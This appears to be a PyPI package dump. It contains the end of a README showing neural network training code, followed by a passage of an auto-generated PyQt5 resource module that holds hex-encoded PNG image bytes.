model.append_layer(ReLU())
model.append_layer(Linear(in_features=64, out_features=10))
model.append_layer(SoftMax())
```
## Model compile:
```py
batch_size = 16
model.compile(optimizer=Adam(learning_rate=5e-3, mu=0.98, rho=0.999), loss=CrossEntropyLoss(),
batch_size=batch_size, metrics=['accuracy'])
```
## Model training:
```py
epochs = 25
history = model.fit(x_train=train_images, y_train=train_labels, x_val=val_images, y_val=val_labels, epochs=epochs)
```
## Model performance:
```py
plt.plot(history['accuracy'])
plt.plot(history['val_accuracy'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train', 'val'], loc='upper left')
plt.show()
``` | PypiClean |
/DataShow-6.10.1-py3-none-any.whl/DataReplay/ui/sim_rc.py |
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.15.2)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x2f\xe6\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\xce\x00\x00\x00\x90\x08\x06\x00\x00\x00\x40\x9b\x54\x43\
\x00\x00\x0c\x5f\x69\x43\x43\x50\x49\x43\x43\x20\x50\x72\x6f\x66\
\x69\x6c\x65\x00\x00\x48\x89\x95\x97\x07\x58\x93\x49\x13\x80\xf7\
\x2b\xa9\x24\xb4\x40\x04\xa4\x84\xde\x44\xe9\x04\x90\x12\x42\x8b\
\x20\x20\x55\x10\x95\x90\x04\x12\x4a\x8c\x09\x41\xc5\x8e\x1e\x2a\
\x78\x76\x11\xc5\x8a\x15\x51\xf4\xf4\x04\xe4\xac\x88\xdd\x43\xb1\
\xf7\xc3\x82\x8a\x72\x1e\x9e\x62\x43\xe5\xdf\x90\x80\x9e\xfe\xe5\
\xf9\xe7\x79\xf6\xdb\x37\xb3\xb3\xb3\x33\x93\xdd\xe4\x5b\x00\x74\
\xda\xf8\x32\x59\x1e\xaa\x0b\x40\xbe\xb4\x40\x1e\x1f\x11\xc2\x1a\
\x9d\x9a\xc6\x22\xb5\x03\x04\x98\x00\x0a\x30\x06\x7a\x7c\x81\x42\
\xc6\x89\x8b\x8b\x06\x50\xfa\xfb\x7f\xca\xdb\xeb\xd0\x1a\xca\x15\
\x17\x95\xaf\x1f\xc7\xff\xab\xe8\x0b\x45\x0a\x01\x00\x48\x3a\xe4\
\x4c\xa1\x42\x90\x0f\xf9\x18\x00\x78\xb1\x40\x26\x2f\x00\x80\x18\
\x0a\xf5\xd6\x93\x0a\x64\x2a\x16\x43\x36\x90\xc3\x00\x21\x4f\x53\
\x71\xb6\x9a\x97\xa8\x38\x53\xcd\x5b\xfa\x6c\x12\xe3\xb9\x90\x1b\
\x00\x20\xd3\xf8\x7c\x79\x36\x00\xda\xcd\x50\xcf\x2a\x14\x64\x43\
\x3f\xda\x8f\x21\xbb\x4a\x85\x12\x29\x00\x3a\x06\x90\x03\x05\x62\
\xbe\x10\x72\x22\xe4\x21\xf9\xf9\x13\x54\x3c\x0b\xb2\x03\xb4\x97\
\x41\xde\x01\x99\x9d\xf9\x8d\xcf\xec\x7f\xf8\xcf\x1c\xf0\xcf\xe7\
\x67\x0f\xb0\x3a\xaf\x3e\x21\x87\x4a\x14\xb2\x3c\xfe\x94\xff\xb3\
\x34\xff\x5b\xf2\xf3\x94\xfd\x6b\xd8\xc1\x46\x13\xcb\x23\xe3\x55\
\xf9\xc3\x1a\xde\xcc\x9d\x10\xa5\x62\x1a\xe4\x4e\x69\x66\x4c\xac\
\xaa\xd6\x90\xdf\x4b\x84\xea\xba\x03\x80\x52\xc5\xca\xc8\x24\xb5\
\x3d\x6a\x2a\x50\x70\x61\xfd\x00\x13\xb2\xab\x90\x1f\x1a\x05\xd9\
\x14\x72\xb8\x34\x2f\x26\x5a\xa3\xcf\xcc\x92\x84\xf3\x20\xc3\xdd\
\x82\x4e\x96\x14\xf0\x12\x35\x73\xe7\x8b\x14\x61\x09\x1a\x9f\x6b\
\xe5\x13\xe2\x63\xfb\x39\x4b\xce\xe5\x68\xe6\xd6\xf2\xe5\x7d\xeb\
\xaa\xec\x9b\x95\xb9\x49\x1c\x8d\xff\x9b\x62\x11\xaf\xdf\xff\x9b\
\x22\x71\x62\x0a\x64\x2a\x00\x18\xb5\x50\x92\x1c\x03\x59\x1b\xb2\
\x81\x22\x37\x21\x4a\x6d\x83\x59\x15\x89\xb9\x31\xfd\x36\x72\x65\
\xbc\x2a\x7e\x1b\xc8\x6c\x91\x34\x22\x44\xed\x1f\x4b\xcf\x92\x87\
\xc7\x6b\xec\x65\xf9\x8a\xfe\x7c\xb1\x12\xb1\x84\x17\xa3\xe1\x8a\
\x02\x71\x62\xa4\xba\x3e\xd8\x4e\x01\xbf\x2f\x7e\x23\xc8\x75\x22\
\x29\x27\xa9\xdf\x8f\x48\x31\x3a\xba\x3f\x17\xa1\x28\x34\x4c\x9d\
\x3b\xd6\x22\x92\x26\x69\xf2\xc5\xee\xcb\x0a\x42\xe2\x35\x73\xbb\
\x64\x79\x71\x1a\x7b\x9c\x2c\xca\x8b\x50\xe9\xad\x20\x9b\x28\x0a\
\x13\x34\x73\xf1\xe1\x05\x70\x73\xaa\xfd\xe3\xd1\xb2\x82\xb8\x44\
\x75\x9c\x78\x46\x0e\x7f\x44\x9c\x3a\x1e\xbc\x10\x44\x03\x2e\x08\
\x05\x2c\xa0\x84\x2d\x13\x4c\x00\x39\x40\xd2\xd2\x59\xdf\x09\x3f\
\xa9\x47\xc2\x01\x1f\xc8\x41\x36\x10\x01\x17\x8d\xa6\x7f\x46\x4a\
\xdf\x88\x14\x3e\x13\x40\x11\xf8\x13\x92\x08\x28\x06\xe6\x85\xf4\
\x8d\x8a\x40\x21\xd4\x7f\x1e\xd0\xaa\x9f\x2e\x20\xab\x6f\xb4\xb0\
\x6f\x46\x2e\x78\x02\x39\x1f\x44\x81\x3c\xf8\x59\xd9\x37\x4b\x3a\
\xb0\x5a\x32\x78\x0c\x35\x92\x1f\x56\x17\xc0\x58\xf3\x60\x53\x8d\
\xfd\xa8\xe3\x40\x4d\xb4\x46\xa3\xec\xf7\xcb\xd2\xe9\xb7\x24\x86\
\x11\x43\x89\x91\xc4\x70\xa2\x23\x6e\x82\x07\xe2\xfe\x78\x34\x7c\
\x06\xc3\xe6\x8e\xb3\x71\xdf\xfe\x68\xbf\xda\x13\x9e\x10\x5a\x09\
\x0f\x09\xd7\x08\x6d\x84\x5b\xe3\x25\xc5\xf2\xef\x62\x19\x09\xda\
\xa0\xff\x70\x4d\xc6\x99\xdf\x66\x8c\xdb\x41\x9f\x5e\x78\x08\x1e\
\x00\xbd\x43\xcf\x38\x13\x37\x01\x2e\xb8\x27\x5c\x87\x83\x07\xc1\
\x95\xbd\xa0\x96\xab\x89\x5b\x95\x3b\xeb\xdf\xe4\x39\x90\xc1\x37\
\x35\xd7\xd8\x51\x5c\x29\x28\x65\x10\x25\x98\xe2\xf0\xfd\x4c\x6d\
\x27\x6d\xaf\x01\x2f\xaa\x8a\x7e\x5b\x1f\x75\xac\x99\x03\x55\xe5\
\x0e\x8c\x7c\xbf\x3e\xf7\x9b\x3a\x0b\x61\x1f\xf5\xbd\x25\x36\x1f\
\xdb\x8f\x9d\xc6\x8e\x63\x67\xb1\x43\x58\x3d\x60\x61\x47\xb1\x06\
\xec\x02\x76\x58\xc5\x03\x7b\xe8\x71\xdf\x1e\xea\x5f\x2d\xbe\x2f\
\x9e\x5c\xe8\x47\xf2\xc3\x7a\x7c\xcd\x9a\xaa\x4a\x2a\x5c\x6b\x5c\
\x3b\x5c\x3f\x69\xc6\x40\x81\x68\x72\x81\xea\x80\x71\x27\xc8\xa6\
\xc8\x25\xd9\xe2\x02\x16\x07\xfe\x0b\x88\x58\x3c\xa9\x60\xe8\x10\
\x96\xbb\xab\xbb\x1b\x00\xaa\xff\x14\xf5\xcf\xd4\x6b\x66\xdf\x7f\
\x05\xc2\x3c\xf7\x55\x97\xfb\x0a\x00\xef\x5b\xf0\x8c\x09\xbf\xea\
\x84\x4b\x01\x38\x68\x02\x8f\x92\xc3\x57\x9d\x1d\x3c\x2b\xba\x74\
\x00\x8e\x6c\x12\x28\xe5\x85\x6a\x1d\xae\x7a\x10\xe0\xaf\x81\x0e\
\x3c\x51\xc6\xc0\x1c\x58\x03\x07\x98\x91\x3b\xf0\x06\xfe\x20\x18\
\x84\x81\x11\x20\x16\x24\x82\x54\x30\x0e\xd6\x59\x0c\xf7\xb3\x1c\
\x4c\x02\xd3\xc0\x6c\x50\x02\xca\xc0\x12\xb0\x12\xac\x01\x1b\xc0\
\x66\xb0\x03\xec\x06\xfb\x40\x3d\x38\x04\x8e\x83\x53\xe0\x3c\xb8\
\x04\xae\x81\x3b\x70\xff\xb4\x83\x17\xa0\x0b\xbc\x05\x3d\x08\x82\
\x90\x10\x3a\xc2\x40\x8c\x11\x0b\xc4\x16\x71\x46\xdc\x11\x36\x12\
\x88\x84\x21\xd1\x48\x3c\x92\x8a\x64\x20\xd9\x88\x14\x51\x22\xd3\
\x90\x39\x48\x19\xb2\x0c\x59\x83\x6c\x42\xaa\x91\x5f\x90\x83\xc8\
\x71\xe4\x2c\xd2\x8a\xdc\x42\x1e\x20\x1d\xc8\xdf\xc8\x47\x14\x43\
\x69\xa8\x01\x6a\x86\xda\xa1\xc3\x50\x36\xca\x41\xa3\xd0\x44\x74\
\x2c\x9a\x8d\x4e\x44\x8b\xd0\xb9\xe8\x22\xb4\x02\xad\x42\x77\xa1\
\x75\xe8\x71\xf4\x3c\x7a\x0d\x6d\x43\x5f\xa0\xdd\x18\xc0\xb4\x30\
\x26\x66\x89\xb9\x60\x6c\x8c\x8b\xc5\x62\x69\x58\x16\x26\xc7\x66\
\x60\xa5\x58\x39\x56\x85\xd5\x62\x8d\xf0\x9b\xbe\x82\xb5\x61\x9d\
\xd8\x07\x9c\x88\x33\x70\x16\xee\x02\xf7\x70\x24\x9e\x84\x0b\xf0\
\x89\xf8\x0c\x7c\x21\xbe\x06\xdf\x81\xd7\xe1\xcd\xf8\x15\xfc\x01\
\xde\x85\x7f\x21\xd0\x09\xa6\x04\x67\x82\x1f\x81\x47\x18\x4d\xc8\
\x26\x4c\x22\x94\x10\xca\x09\xdb\x08\x07\x08\x27\xe1\x69\x6a\x27\
\xbc\x25\x12\x89\x4c\xa2\x3d\xd1\x07\x9e\xc6\x54\x62\x0e\x71\x2a\
\x71\x21\x71\x1d\x71\x0f\xf1\x18\xb1\x95\xf8\x88\xd8\x4d\x22\x91\
\x8c\x49\xce\xa4\x00\x52\x2c\x89\x4f\x2a\x20\x95\x90\x56\x93\x76\
\x91\x8e\x92\x2e\x93\xda\x49\xef\xc9\x5a\x64\x0b\xb2\x3b\x39\x9c\
\x9c\x46\x96\x92\x8b\xc9\xe5\xe4\x9d\xe4\x23\xe4\xcb\xe4\xa7\xe4\
\x1e\x8a\x2e\xc5\x96\xe2\x47\x89\xa5\x08\x29\x53\x28\x8b\x29\x5b\
\x28\x8d\x94\x8b\x94\x76\x4a\x0f\x55\x8f\x6a\x4f\x0d\xa0\x26\x52\
\x73\xa8\xb3\xa9\x15\xd4\x5a\xea\x49\xea\x5d\xea\x6b\x2d\x2d\x2d\
\x2b\x2d\x5f\xad\x51\x5a\x12\xad\x59\x5a\x15\x5a\x7b\xb5\xce\x68\
\x3d\xd0\xfa\x40\xd3\xa7\x39\xd1\xb8\xb4\x74\x9a\x92\xb6\x88\xb6\
\x9d\x76\x8c\x76\x8b\xf6\x9a\x4e\xa7\xdb\xd1\x83\xe9\x69\xf4\x02\
\xfa\x22\x7a\x35\xfd\x04\xfd\x3e\xfd\xbd\x36\x43\x7b\xa8\x36\x4f\
\x5b\xa8\x3d\x53\xbb\x52\xbb\x4e\xfb\xb2\xf6\x4b\x1d\x8a\x8e\xad\
\x0e\x47\x67\x9c\x4e\x91\x4e\xb9\xce\x7e\x9d\x8b\x3a\x9d\xba\x14\
\x5d\x3b\x5d\xae\x2e\x5f\x77\x86\x6e\xa5\xee\x41\xdd\x1b\xba\xdd\
\x7a\x0c\x3d\x37\xbd\x58\xbd\x7c\xbd\x85\x7a\x3b\xf5\xce\xea\x3d\
\xd3\x27\xe9\xdb\xe9\x87\xe9\x0b\xf5\xe7\xea\x6f\xd6\x3f\xa1\xff\
\x88\x81\x31\xac\x19\x5c\x86\x80\x31\x87\xb1\x85\x71\x92\xd1\x6e\
\x40\x34\xb0\x37\xe0\x19\xe4\x18\x94\x19\xec\x36\x68\x31\xe8\x32\
\xd4\x37\xf4\x34\x4c\x36\x9c\x6c\x58\x69\x78\xd8\xb0\x8d\x89\x31\
\xed\x98\x3c\x66\x1e\x73\x31\x73\x1f\xf3\x3a\xf3\xe3\x20\xb3\x41\
\x9c\x41\xa2\x41\x0b\x06\xd5\x0e\xba\x3c\xe8\x9d\xd1\x60\xa3\x60\
\x23\x91\x51\xa9\xd1\x1e\xa3\x6b\x46\x1f\x8d\x59\xc6\x61\xc6\xb9\
\xc6\x4b\x8d\xeb\x8d\xef\x99\xe0\x26\x4e\x26\xa3\x4c\x26\x99\xac\
\x37\x39\x69\xd2\x39\xd8\x60\xb0\xff\x60\xc1\xe0\xd2\xc1\xfb\x06\
\xdf\x36\x45\x4d\x9d\x4c\xe3\x4d\xa7\x9a\x6e\x36\xbd\x60\xda\x6d\
\x66\x6e\x16\x61\x26\x33\x5b\x6d\x76\xc2\xac\xd3\x9c\x69\x1e\x6c\
\x9e\x63\xbe\xc2\xfc\x88\x79\x87\x05\xc3\x22\xd0\x42\x62\xb1\xc2\
\xe2\xa8\xc5\x73\x96\x21\x8b\xc3\xca\x63\x55\xb0\x9a\x59\x5d\x96\
\xa6\x96\x91\x96\x4a\xcb\x4d\x96\x2d\x96\x3d\x56\xf6\x56\x49\x56\
\xc5\x56\x7b\xac\xee\x59\x53\xad\xd9\xd6\x59\xd6\x2b\xac\x9b\xac\
\xbb\x6c\x2c\x6c\x46\xda\x4c\xb3\xa9\xb1\xb9\x6d\x4b\xb1\x65\xdb\
\x8a\x6d\x57\xd9\x9e\xb6\x7d\x67\x67\x6f\x97\x62\x37\xcf\xae\xde\
\xee\x99\xbd\x91\x3d\xcf\xbe\xc8\xbe\xc6\xfe\xae\x03\xdd\x21\xc8\
\x61\xa2\x43\x95\xc3\x55\x47\xa2\x23\xdb\x31\xd7\x71\x9d\xe3\x25\
\x27\xd4\xc9\xcb\x49\xec\x54\xe9\x74\xd1\x19\x75\xf6\x76\x96\x38\
\xaf\x73\x6e\x1d\x42\x18\xe2\x3b\x44\x3a\xa4\x6a\xc8\x0d\x17\x9a\
\x0b\xc7\xa5\xd0\xa5\xc6\xe5\xc1\x50\xe6\xd0\xe8\xa1\xc5\x43\xeb\
\x87\xbe\x1c\x66\x33\x2c\x6d\xd8\xd2\x61\xa7\x87\x7d\x71\xf5\x72\
\xcd\x73\xdd\xe2\x7a\xc7\x4d\xdf\x6d\x84\x5b\xb1\x5b\xa3\xdb\xdf\
\xee\x4e\xee\x02\xf7\x4a\xf7\xab\x1e\x74\x8f\x70\x8f\x99\x1e\x0d\
\x1e\xaf\x3c\x9d\x3d\x45\x9e\xeb\x3d\x6f\x7a\x31\xbc\x46\x7a\xcd\
\xf3\x6a\xf2\xfa\xec\xed\xe3\x2d\xf7\xae\xf5\xee\xf0\xb1\xf1\xc9\
\xf0\x59\xeb\x73\x83\x6d\xc0\x8e\x63\x2f\x64\x9f\xf1\x25\xf8\x86\
\xf8\xce\xf4\x3d\xe4\xfb\xc1\xcf\xdb\xaf\xc0\x6f\x9f\xdf\x5f\xfe\
\x2e\xfe\xb9\xfe\x3b\xfd\x9f\x0d\xb7\x1f\x2e\x1a\xbe\x65\xf8\xa3\
\x00\xab\x00\x7e\xc0\xa6\x80\xb6\x40\x56\x60\x46\xe0\xc6\xc0\xb6\
\x20\xcb\x20\x7e\x50\x55\xd0\xc3\x60\xeb\x60\x61\xf0\xb6\xe0\xa7\
\x1c\x47\x4e\x0e\x67\x17\xe7\x65\x88\x6b\x88\x3c\xe4\x40\xc8\x3b\
\xae\x1f\x77\x3a\xf7\x58\x28\x16\x1a\x11\x5a\x1a\xda\x12\xa6\x1f\
\x96\x14\xb6\x26\xec\x7e\xb8\x55\x78\x76\x78\x4d\x78\x57\x84\x57\
\xc4\xd4\x88\x63\x91\x84\xc8\xa8\xc8\xa5\x91\x37\x78\x66\x3c\x01\
\xaf\x9a\xd7\x35\xc2\x67\xc4\xf4\x11\xcd\x51\xb4\xa8\x84\xa8\x35\
\x51\x0f\xa3\x9d\xa2\xe5\xd1\x8d\x23\xd1\x91\x23\x46\x2e\x1f\x79\
\x37\xc6\x36\x46\x1a\x53\x1f\x0b\x62\x79\xb1\xcb\x63\xef\xc5\xd9\
\xc7\x4d\x8c\xfb\x6d\x14\x71\x54\xdc\xa8\xca\x51\x4f\xe2\xdd\xe2\
\xa7\xc5\x9f\x4e\x60\x24\x8c\x4f\xd8\x99\xf0\x36\x31\x24\x71\x71\
\xe2\x9d\x24\x87\x24\x65\x52\x53\xb2\x4e\x72\x7a\x72\x75\xf2\xbb\
\x94\xd0\x94\x65\x29\x6d\xa3\x87\x8d\x9e\x3e\xfa\x7c\xaa\x49\xaa\
\x24\xb5\x21\x8d\x94\x96\x9c\xb6\x2d\xad\x7b\x4c\xd8\x98\x95\x63\
\xda\xd3\xbd\xd2\x4b\xd2\xaf\x8f\xb5\x1f\x3b\x79\xec\xd9\x71\x26\
\xe3\xf2\xc6\x1d\x1e\xaf\x33\x9e\x3f\x7e\x7f\x06\x21\x23\x25\x63\
\x67\xc6\x27\x7e\x2c\xbf\x8a\xdf\x9d\xc9\xcb\x5c\x9b\xd9\x25\xe0\
\x0a\x56\x09\x5e\x08\x83\x85\x2b\x84\x1d\xa2\x00\xd1\x32\xd1\xd3\
\xac\x80\xac\x65\x59\xcf\xb2\x03\xb2\x97\x67\x77\x88\x83\xc4\xe5\
\xe2\x4e\x09\x57\xb2\x46\xf2\x2a\x27\x32\x67\x43\xce\xbb\xdc\xd8\
\xdc\xed\xb9\xbd\x79\x29\x79\x7b\xf2\xc9\xf9\x19\xf9\x07\xa5\xfa\
\xd2\x5c\x69\xf3\x04\xf3\x09\x93\x27\xb4\xca\x9c\x65\x25\xb2\xb6\
\x89\x7e\x13\x57\x4e\xec\x92\x47\xc9\xb7\x29\x10\xc5\x58\x45\x43\
\x81\x01\x7c\x79\xbf\xa0\x74\x50\xfe\xa4\x7c\x50\x18\x58\x58\x59\
\xf8\x7e\x52\xf2\xa4\xfd\x93\xf5\x26\x4b\x27\x5f\x98\xe2\x34\x65\
\xc1\x94\xa7\x45\xe1\x45\x5b\xa7\xe2\x53\x05\x53\x9b\xa6\x59\x4e\
\x9b\x3d\xed\xc1\x74\xce\xf4\x4d\x33\x90\x19\x99\x33\x9a\x66\x5a\
\xcf\x9c\x3b\xb3\x7d\x56\xc4\xac\x1d\xb3\xa9\xb3\x73\x67\xff\x5e\
\xec\x5a\xbc\xac\xf8\xcd\x9c\x94\x39\x8d\x73\xcd\xe6\xce\x9a\xfb\
\xe8\xa7\x88\x9f\x6a\x4a\xb4\x4b\xe4\x25\x37\xe6\xf9\xcf\xdb\x30\
\x1f\x9f\x2f\x99\xdf\xb2\xc0\x63\xc1\xea\x05\x5f\x4a\x85\xa5\xe7\
\xca\x5c\xcb\xca\xcb\x3e\x2d\x14\x2c\x3c\xf7\xb3\xdb\xcf\x15\x3f\
\xf7\x2e\xca\x5a\xd4\xb2\xd8\x7b\xf1\xfa\x25\xc4\x25\xd2\x25\xd7\
\x97\x06\x2d\xdd\xb1\x4c\x6f\x59\xd1\xb2\x47\xcb\x47\x2e\xaf\x5b\
\xc1\x5a\x51\xba\xe2\xcd\xca\xf1\x2b\xcf\x96\x7b\x96\x6f\x58\x45\
\x5d\xa5\x5c\xd5\x56\x11\x5d\xd1\xb0\xda\x66\xf5\x92\xd5\x9f\xd6\
\x88\xd7\x5c\xab\x0c\xa9\xdc\xb3\xd6\x74\xed\x82\xb5\xef\xd6\x09\
\xd7\x5d\x5e\x1f\xbc\xbe\x76\x83\xd9\x86\xb2\x0d\x1f\x37\x4a\x36\
\xde\xdc\x14\xb1\xa9\xae\xca\xae\xaa\x7c\x33\x71\x73\xe1\xe6\x27\
\x5b\x92\xb7\x9c\xde\xca\xde\x5a\xbd\xcd\x64\x5b\xd9\xb6\xcf\xdb\
\xa5\xdb\xdb\x76\xc4\xef\x68\xae\xf6\xa9\xae\xde\x69\xba\x73\x71\
\x0d\x5a\xa3\xac\xe9\xd8\x95\xbe\xeb\xd2\xee\xd0\xdd\x0d\xb5\x2e\
\xb5\x9b\xf6\x30\xf7\x94\xed\x05\x7b\x95\x7b\x9f\xff\x92\xf1\xcb\
\xf5\x7d\x51\xfb\x9a\xf6\xb3\xf7\xd7\xfe\x6a\xfb\xeb\xda\x03\x8c\
\x03\xa5\x75\x48\xdd\x94\xba\xae\x7a\x71\x7d\x5b\x43\x6a\x43\xeb\
\xc1\x11\x07\x9b\x1a\xfd\x1b\x0f\xfc\x36\xf4\xb7\xed\x87\x2c\x0f\
\x55\x1e\x36\x3c\xbc\xf8\x08\xf5\xc8\xdc\x23\xbd\x47\x8b\x8e\x76\
\x1f\x93\x1d\xeb\x3c\x9e\x7d\xfc\x51\xd3\xf8\xa6\x3b\x27\x46\x9f\
\xb8\xda\x3c\xaa\xb9\xe5\x64\xd4\xc9\x33\xa7\xc2\x4f\x9d\x38\xcd\
\x39\x7d\xf4\x4c\xc0\x99\x43\x67\xfd\xce\x1e\x3c\xc7\x3e\x57\x7f\
\xde\xfb\x7c\xdd\x05\xaf\x0b\x07\x7e\xf7\xfa\xfd\x40\x8b\x77\x4b\
\xdd\x45\x9f\x8b\x0d\x97\x7c\x2f\x35\xb6\x0e\x6f\x3d\x72\x39\xe8\
\xf2\xf1\x2b\xa1\x57\x4e\x5d\xe5\x5d\x3d\x7f\x2d\xe6\x5a\xeb\xf5\
\xa4\xeb\x37\x6f\xa4\xdf\x68\xbb\x29\xbc\xf9\xec\x56\xde\xad\x57\
\xb7\x0b\x6f\xf7\xdc\x99\x75\x97\x70\xb7\xf4\x9e\xee\xbd\xf2\xfb\
\xa6\xf7\xab\xfe\x70\xfc\x63\x4f\x9b\x77\xdb\xe1\x07\xa1\x0f\x2e\
\x3c\x4c\x78\x78\xe7\x91\xe0\xd1\x8b\xc7\x8a\xc7\x9f\xda\xe7\x3e\
\xa1\x3f\x29\x7f\x6a\xf1\xb4\xfa\x99\xfb\xb3\x43\x1d\xe1\x1d\x97\
\x9e\x8f\x79\xde\xfe\x42\xf6\xa2\xa7\xb3\xe4\x4f\xbd\x3f\xd7\xbe\
\x74\x78\xf9\xeb\x5f\xc1\x7f\x5d\xe8\x1a\xdd\xd5\xfe\x4a\xfe\xaa\
\xf7\xef\x85\xaf\x8d\x5f\x6f\x7f\xe3\xf9\xa6\xa9\x3b\xae\xfb\xfe\
\xdb\xfc\xb7\x3d\xef\x4a\xdf\x1b\xbf\xdf\xf1\x81\xfd\xe1\xf4\xc7\
\x94\x8f\x4f\x7b\x26\x7d\x22\x7d\xaa\xf8\xec\xf8\xb9\xf1\x4b\xd4\
\x97\xbb\xbd\xf9\xbd\xbd\x32\xbe\x9c\xdf\xf7\x2a\x80\xc1\x86\x66\
\x65\x01\xf0\xf7\x76\x00\xe8\xa9\x00\x30\x2e\xc1\x6b\xc2\x18\xf5\
\x9d\xaf\x4f\x10\xf5\x3d\xb5\x8f\xc0\x7f\x62\xf5\xbd\xb0\x4f\xbc\
\x01\xd8\x3a\x0b\x00\xd5\x75\x20\x16\xf6\xeb\x55\xef\x20\xb0\xd7\
\x09\x06\x40\xf5\xaa\x9e\x18\x0c\x50\x0f\x8f\x81\xa6\x11\x45\x96\
\x87\xbb\xda\x17\x0d\xde\x78\x08\xef\x7b\x7b\x5f\x9b\x01\x40\x6a\
\x04\xe0\xb3\xbc\xb7\xb7\x67\x5d\x6f\xef\x67\x78\x47\xc5\xe0\xfb\
\xce\xb1\x89\xea\xbb\xa6\x4a\x88\xf0\x6e\xb0\xd1\x57\x45\xd7\x3c\
\x0d\xc0\xf7\xa2\xbe\x87\x7e\x93\xe3\xf7\x3d\x50\x45\xe0\x09\xbe\
\xef\xff\x05\xfc\x06\x83\x7f\x16\x57\xfb\xf5\x00\x00\x00\x6c\x65\
\x58\x49\x66\x4d\x4d\x00\x2a\x00\x00\x00\x08\x00\x04\x01\x1a\x00\
\x05\x00\x00\x00\x01\x00\x00\x00\x3e\x01\x1b\x00\x05\x00\x00\x00\
\x01\x00\x00\x00\x46\x01\x28\x00\x03\x00\x00\x00\x01\x00\x02\x00\
\x00\x87\x69\x00\x04\x00\x00\x00\x01\x00\x00\x00\x4e\x00\x00\x00\
\x00\x00\x00\x00\x90\x00\x00\x00\x01\x00\x00\x00\x90\x00\x00\x00\
\x01\x00\x02\xa0\x02\x00\x04\x00\x00\x00\x01\x00\x00\x00\xce\xa0\
\x03\x00\x04\x00\x00\x00\x01\x00\x00\x00\x90\x00\x00\x00\x00\x5e\
\x26\xe7\x91\x00\x00\x00\x09\x70\x48\x59\x73\x00\x00\x16\x25\x00\
\x00\x16\x25\x01\x49\x52\x24\xf0\x00\x00\x22\xb5\x49\x44\x41\x54\
\x78\x01\xed\x5d\x07\x9c\x15\xd5\xd5\x3f\xc8\x02\xdb\x1b\xcb\xc2\
\x2e\x6d\x97\xd0\x8b\x01\x29\x31\x09\x82\x68\x40\x05\xd4\xa0\x68\
\x7e\x16\x04\xd4\x0f\x0c\xa8\x91\xa8\x18\x34\x16\xd4\x28\x6a\x44\
\xb1\x22\x6a\x00\xdb\xa7\x10\x7e\xca\x07\x18\x01\x11\xf3\xe9\x27\
\xa8\x48\x31\xd2\xcb\x52\x76\x59\x60\x0b\xdb\x2b\xe5\x3b\xff\x91\
\xb7\xcc\xbb\x73\xe7\xed\x2b\x77\xde\x7b\xcb\xde\xf3\xfb\xbd\xdd\
\x99\x3b\x33\xb7\x9c\xb9\x67\x4e\xb9\xe7\x9e\xd3\x84\x18\x4e\x33\
\xe0\xbf\x06\x8d\x01\x8d\x01\xef\x30\x70\x9e\x77\xb7\xe9\xbb\x34\
\x06\x34\x06\xcc\x18\xd0\x84\x63\xc6\x86\x3e\xd6\x18\xf0\x12\x03\
\x9a\x70\xbc\x44\x94\xbe\x4d\x63\xc0\x8c\x01\x4d\x38\x66\x6c\xe8\
\x63\x8d\x01\x2f\x31\xa0\x09\xc7\x4b\x44\xe9\xdb\x34\x06\xcc\x18\
\xd0\x84\x63\xc6\x86\x3e\xd6\x18\xf0\x12\x03\x9a\x70\xbc\x44\x94\
\xbe\x4d\x63\xc0\x8c\x81\x08\xf3\x49\x43\x3d\x5e\x55\x50\x41\x59\
\x95\xb5\xb6\xdd\x2f\x3b\x71\x9a\xee\xcd\x48\xb4\xbd\xae\x2f\x68\
\x0c\xf8\x8a\x81\x06\x4d\x38\x25\x27\x4e\xd1\x7f\x6d\xcb\xa3\x45\
\x85\x15\x44\xe7\x35\xb1\x8e\xfd\xd4\x69\xfa\x55\x4c\x0b\x9a\xd7\
\x3d\xc5\x7a\x4d\x97\x68\x0c\x04\x80\x01\x63\xb6\x35\x44\xcf\x81\
\x5a\x76\x76\xb8\x6c\xd3\x11\xda\x50\x51\x43\x32\x79\xb3\x8a\x7d\
\x21\x26\xa4\x44\xd3\xdc\x1e\xad\x02\x40\x8f\x7e\x54\x63\x40\x8e\
\x01\xd9\x9c\x93\xdf\x19\x46\xa5\x85\xb5\xa7\x68\x24\x13\xcd\xbf\
\xcb\xab\xa5\x44\x53\xca\x44\xf5\x40\x7a\x9c\x41\x34\xda\x97\x28\
\x8c\x5e\xdc\x39\xd4\x95\x06\xc7\x71\xc0\x69\x7e\xb7\x31\x97\xb6\
\xd8\xe8\x34\x11\x3c\xa2\x77\xbb\xb7\xa2\x2b\x5a\x46\x9f\x43\xaf\
\x49\x0f\x25\xdc\x30\xd0\xa0\x38\x4e\x31\xeb\x34\xa3\x98\xd3\x7c\
\xcd\xe2\x99\x08\xa7\xb8\x20\xa9\x69\x13\x5a\xd2\x33\x55\x13\x8d\
\x88\x1c\x7d\xae\x1c\x03\x0d\x86\xe3\x9c\x64\x99\xeb\xea\x2d\x4c\
\x34\x65\xd5\x52\x24\x24\xb0\x71\x60\x4d\xdf\x34\xea\x1c\xdd\x4c\
\x7a\x5d\x17\x6a\x0c\xa8\xc4\x40\x83\xe0\x38\x20\x9a\x71\x5b\x8f\
\xd1\x8a\x92\x2a\xcb\xd8\xc1\x69\xd2\x22\x9a\xd2\xf2\xf3\xdb\x68\
\xa2\xb1\x60\x47\x17\x38\x85\x81\xb0\x37\x47\x43\xb9\x9f\xb6\x2b\
\x9f\x3e\x2d\xaa\x24\x70\x15\x11\x92\xb8\x6c\xf9\xf9\xad\xe9\x17\
\x9a\xd3\x88\xa8\xd1\xe7\x0e\x62\x20\xec\x39\xce\xc2\xc3\xa5\xf4\
\xfa\xb1\x32\x0b\x0a\xc0\x69\x92\x59\xa7\x59\xde\xa7\x8d\x26\x1a\
\x0b\x76\x74\x81\xd3\x18\x08\x6b\x1d\x07\x1e\x01\x63\x78\x81\xb3\
\x99\x95\xd1\x50\x74\x93\x26\xb4\xf2\x97\x6d\xa8\x4f\x6c\x73\xa7\
\x71\xa4\xeb\xd7\x18\xb0\x60\x20\x6c\x45\xb5\x9c\xea\x93\x34\x65\
\x57\x81\x94\x68\x8a\x79\x1d\xe7\x43\x16\xcf\x34\xd1\x58\xde\xa7\
